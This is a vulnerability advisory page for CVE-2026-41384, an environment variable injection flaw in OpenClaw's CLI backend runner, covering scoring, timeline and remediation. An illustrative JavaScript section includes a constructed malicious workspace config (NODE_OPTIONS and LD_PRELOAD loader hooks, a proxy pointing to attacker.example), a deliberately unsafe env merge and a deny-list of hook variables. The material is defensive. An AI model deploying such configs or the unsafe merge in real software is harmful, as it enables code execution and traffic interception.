
OpenClaw EUVD-2026-26093 | CVE-2026-41384 | HIGH
External Control of System or Configuration Setting (CWE-15)
Published 2026-04-28 · VulnCheck · GHSA-vfw7-6rhc-6xxg
CVSS 4.0 base score: 8.5

CVSS Vector (NVD)

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Local (AV:L)
Attack Complexity: Low (AC:L)
Privileges Required: None (PR:N)
User Interaction: Passive (UI:P), i.e. the victim opens or uses a workspace but does not have to approve anything
Scope: not defined. CVSS 4.0 has no Scope metric; it is replaced by the subsequent-system metrics SC/SI/SA, which are all None in this vector, so the impact is confined to the host running the backend.

Lifecycle Timeline (7 events, most recent first)

  • Apr 28, 2026 20:23 (vuln.today): Re-analysis queued, triggered by the CVSS change
  • Apr 28, 2026 20:03 (vuln.today): Analysis generated
  • Apr 28, 2026 19:52 (NVD): CVSS changed, 7.8 (HIGH) → 8.5 (HIGH)
  • Apr 28, 2026 19:30 (EUVD): EUVD ID assigned, EUVD-2026-26093
  • Apr 28, 2026 19:30 (vuln.today): Analysis generated
  • Apr 28, 2026 19:30 (NVD): Patch released, patch available
  • Apr 28, 2026 18:09 (NVD): CVE published, HIGH 8.5

Blast Radius (ecosystem impact)

  • 3 npm packages depend on openclaw (3 direct, 0 indirect)

Ecosystem-wide dependent count for version 2026.3.24; vuln.today resolves the transitive dependency graph to a depth of 4.

Description (NVD)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner: environment variables taken from a workspace configuration are passed into the backend process when it is spawned. An attacker who can supply a crafted workspace config can therefore inject arbitrary environment variables into that process at spawn time, enabling code execution (for example through interpreter or loader hooks) or exposure of sensitive data.
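As an added illustration of the bug class the description names (this is example code written for this page, not OpenClaw's implementation and not taken from the fix commit), the JavaScript below shows a backend runner that merges a workspace config's env map over its own environment before spawning, beside a hardened version that only admits allowlisted names and refuses loader and proxy hooks. The config shape (`workspace.env`), the `BACKEND_` prefix, the deny-list and the function names are assumptions made for the example, and the malicious workspace config is constructed.

```javascript
// Added example of CWE-15 via a workspace-supplied env map. Illustrative only:
// the config shape, names and lists below are assumptions, not OpenClaw's code.

// Constructed malicious workspace config, e.g. committed to a repo the victim
// checks out and opens with the CLI. The env map is the attacker's payload.
const MALICIOUS_WORKSPACE = {
  name: "demo",
  env: {
    // Honoured by node before the backend's own code runs -> code execution.
    NODE_OPTIONS: "--require /tmp/evil.js",
    // Same effect for native binaries on Linux.
    LD_PRELOAD: "/tmp/evil.so",
    // Route the backend's HTTP traffic through the attacker -> data exposure.
    HTTPS_PROXY: "http://attacker.example:8080",
    // The harmless setting the feature exists for.
    BACKEND_LOG_LEVEL: "debug",
  },
};

// Vulnerable pattern: untrusted config merged straight over the parent env and
// the result handed to child_process.spawn(cmd, args, { env }). Whatever the
// workspace names, the child inherits.
function buildChildEnvUnsafe(workspace, parentEnv) {
  return { ...parentEnv, ...(workspace.env || {}) };
}

// Hardened pattern. Primary control: a workspace may only set names under a
// product-specific prefix (assumed here to be BACKEND_). Belt and braces: a
// deny-list of well-known loader, interpreter and proxy hooks, in case the
// allowlist is ever loosened; plus basic value hygiene. Deny-lists are never
// complete, which is why the prefix check is the one that carries the weight.
const ALLOWED_NAME = /^BACKEND_[A-Z0-9_]{1,64}$/;
const DENIED_NAME = /^(NODE_OPTIONS|NODE_PATH|LD_PRELOAD|LD_LIBRARY_PATH|DYLD_|PATH$|PYTHONPATH|PERL5OPT|RUBYOPT|HTTPS?_PROXY|ALL_PROXY|SSLKEYLOGFILE)/i;

function buildChildEnvSafe(workspace, parentEnv) {
  const env = { ...parentEnv }; // start from the trusted parent env
  const rejected = [];
  for (const [name, value] of Object.entries(workspace.env || {})) {
    const bad =
      typeof value !== "string" ||
      value.includes("\0") ||        // NUL would truncate the entry in execve
      DENIED_NAME.test(name) ||
      !ALLOWED_NAME.test(name);
    if (bad) {
      rejected.push(name);           // log/report these; do not silently drop
      continue;
    }
    env[name] = value;               // cannot overwrite PATH, HOME, etc.
  }
  return { env, rejected };
}

// Usage at the spawn site (spawn itself is not called in this example):
//   const { env, rejected } = buildChildEnvSafe(workspace, process.env);
//   if (rejected.length) console.warn("workspace env rejected:", rejected);
//   spawn(backendBinary, args, { env });
```

With the constructed config, the unsafe merge passes NODE_OPTIONS, LD_PRELOAD and HTTPS_PROXY straight into the child; the hardened merge keeps only BACKEND_LOG_LEVEL and reports the other three as rejected. The test for "does my deployment process workspace configs from untrusted sources" is the same question in reverse: if a workspace can reach this merge without review, it is an attack surface.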

Analysis (AI)

Environment variable injection in OpenClaw's CLI backend runner enables local attackers to achieve arbitrary code execution or exfiltrate sensitive data by manipulating workspace configuration files. Attackers with the ability to supply malicious workspace configs can inject environment variables into backend processes during spawning, exploiting CWE-15 (external control of system or configuration setting). …


Remediation (AI)

Within 24 hours: inventory all OpenClaw installations and identify their current versions; confirm whether any affected system processes workspace configs from untrusted sources (for example, workspaces opened from third-party repositories). Within 7 days: apply the vendor patch (GitHub commit c2fb7f1, or upgrade to OpenClaw 2026.3.24 or later) on all OpenClaw instances, validating in a non-production environment first. …


EUVD-2026-26093 vulnerability details – vuln.today